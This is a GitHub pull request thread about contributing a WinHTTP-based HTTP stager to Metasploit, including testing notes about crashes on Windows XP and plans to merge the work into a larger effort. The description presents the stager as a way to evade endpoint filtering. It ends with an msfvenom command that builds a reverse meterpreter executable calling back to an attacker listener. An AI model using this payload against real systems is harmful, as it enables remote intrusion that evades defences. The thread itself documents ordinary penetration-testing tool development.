HTTP stager based on WinHttp #4608
Conversation
Oops! Need to update spec/modules/payloads_spec.rb ...
@BorjaMerino when you say useful for bypassing filtering, do you mean recognition of the payload itself, or that somehow WinHTTP actually helps you bypass filtering of the traffic?
@dmaloney-r7 I did not explain myself very well, sorry. I mean that the payload could be useful
WinInet is filtered by endpoint protection products as well (where WinHTTP may not be).
@BorjaMerino the staging is part of it, but we would need to implement a WinHTTP transport for meterpreter for that test case to be valid (in the example above, the stager is using WinHTTP but the payload is using WinInet).
@hmoore-r7 yes, of course. I did not find any stage working with WinHTTP, so I used meterpreter just to show that the stager works. In the meantime, the stager could be useful if someone has their own reflective DLL/stage using WinHTTP.
@BorjaMerino the stager works well on Windows 7, but crashes on XP.
@dmaloney-r7 thank you for testing. Could you give me more info about the crash? If I remember well, I also checked it on XP SP3.
@BorjaMerino NO! you must suffer my terrible bug report and try to glean some meaning from it! =) Sorry, tested on Windows XP SP0, English.
XP SP0, dear god, nothing works on that ;)
@kernelsmith aside from all of our other stagers and payloads, you mean?
@dmaloney-r7 xDDDD I will try it with an SP0. Thank you :)
no, not what I meant.
@dmaloney-r7 sorry for the delay :p. With version 5.1, WinHTTP is an operating-system component of the following operating systems:
Grabbing this one because it lines up with some other planned work. We have too many HTTP stagers right now and I plan to consolidate these into newer "complex" payloads that are runtime configurable. This PR is a great start on WinHTTP support, but doesn't support SSL, nor the other use cases (proxy, proxy pstore, etc). It would make more sense to combine this into a bigger effort.
Marking delayed since this is part of #4895
@BorjaMerino I am using this PR as a base for WinHTTP stagers. You can follow the development on my branch. Thank you for your work on this, I will close out this PR once the new one is ready for testing.
@hmoore-r7 you are super welcome :)
Putting this on hold until #4904 is merged, since I plan to reuse the blockapi/exitfunk code from that changeset.
Replaced by #4914
This is an adaptation of the @hmoore-r7 stager (based on WinINet) to WinHTTP; useful to bypass a lot of filtering.
I will create another PR for the HTTPS version since I'm getting some errors I have to solve first.
Tested on Win 7 32/64.
E.g.:
./msfvenom -p windows/meterpreter/reverse_winhttp_http LHOST=192.168.1.34 LPORT=8080 -f exe >winhttp8080.exe